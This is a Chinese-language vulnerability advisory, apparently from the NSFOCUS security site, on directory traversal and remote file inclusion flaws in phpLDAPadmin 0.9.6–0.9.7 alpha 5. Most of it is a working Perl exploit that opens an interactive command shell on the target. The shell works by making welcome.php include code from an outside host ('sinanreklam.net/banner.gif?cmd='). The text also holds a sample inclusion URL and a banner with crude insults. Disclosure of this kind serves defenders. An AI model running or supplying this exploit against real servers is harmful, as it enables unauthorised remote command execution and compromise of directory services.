安全研究
安全漏洞
phpLDAPadmin welcome.php多个远程安全漏洞
发布日期:2005-08-30
更新日期:2005-08-30
受影响系统:
phpLDAPadmin phpLDAPadmin 0.9.7 alpha 5描述:
phpLDAPadmin phpLDAPadmin 0.9.6
BUGTRAQ ID: 14695
CVE(CAN) ID: CAN-2005-2792,CAN-2005-2793
phpLDAPadmin是基于Web的LDAP客户端,允许方便的管理LDAP服务器。
phpLDAPadmin的实现上存在多个输入验证漏洞,远程攻击者可能利用这些漏洞访问服务器上的任意文件、在服务器上执行任意命令。
phpLDAPadmin没有充分检查过滤用户提交的数据,攻击者可以通过目录遍历串访问任意文件,通过远程文件包含在主机上执行任意PHP代码。
<*来源:rgod (rgod@autistici.org)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.example.com/phpldapadmin/welcome.php?custom_welcome_page=http://www.example.com/[malicious code]
#!/usr/bin/perl
#__________ ____ ________
#\______ \ ____ __| _/ \______ \____________ ____ ____ ____
# | _// __ \ / __ | | | \_ __ \__ \ / ___\ / _ \ / \
# | | \ ___// /_/ | | ` \ | \// __ \_/ /_/ > <_> ) | \
# |____|_ /\___ >____ | /_______ /__| (____ /\___ / \____/|___| /
# \/ \/ \/ \/ \//_____/ \/
# Coded By Johnnie Walker <whisky[at]bsdmail[d0t]org>
# Greets: sirh0t , Cute Eliisabeth And Tayphoon
# Suck My Dick: cobradriver , atmaca , kozan
# Red Dragon: Johhnie Walker . Nightmare . Erbil
# f0rtcu We Never f0rget You
use IO::Socket;
if ($ARGV[0] && $ARGV[1])
{
$host = $ARGV[0];
$path = $ARGV[1];
$target = $ARGV[2];
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host",
PeerPort => "80") || die "Can't connect!\r\n";
while (1) {
print 'RedDrag0n@'.$host.'$ ';
$cmd = <STDIN>;
if ($target == 2) {
$file =
"welcome.php?custom_welcome_page=http://sinanreklam.net/banner.gif?cmd="
}
chop($cmd);
last if ($cmd eq 'exit');
print $sock "GET ".$path.$file.$cmd." HTTP/1.1\r\nHost:
".$host."\r\nConnection: Keep-Alive\r\n\r\n";
$vuln=0;
while ($ans = <$sock>)
{
if ($vuln == 1) { print "$ans"; }
last if ($ans =~ /^_end_/);
if ($ans =~ /^_begin_/) { $vuln = 1; }
}
if ($vuln == 0) {print "Exploit Failed :(\r\n";exit();}
}
}
else {
print "phpLDAPadmin 0.9.6 - 0.9.7/alpha5 Remote Command Execution\r\n\r\n";
print "Coded By Johhnie Walker\r\n\r\n";
print "Greets To sirh0t , Cute Eliisabeth And Tayphoon\r\n\r\n";
print "Usage: perl $0 <host> <path_to_phpldapadmin> [target_nr] 2\r\n\r\n";
print "Example: perl $0 victim.com /phpldapadmin/ 2 \r\n\r\n";
exit;
}
建议:
厂商补丁:
phpLDAPadmin
------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://phpldapadmin.sourceforge.net/
浏览次数:2534
严重程度:0(网友投票)
绿盟科技给您安全的保障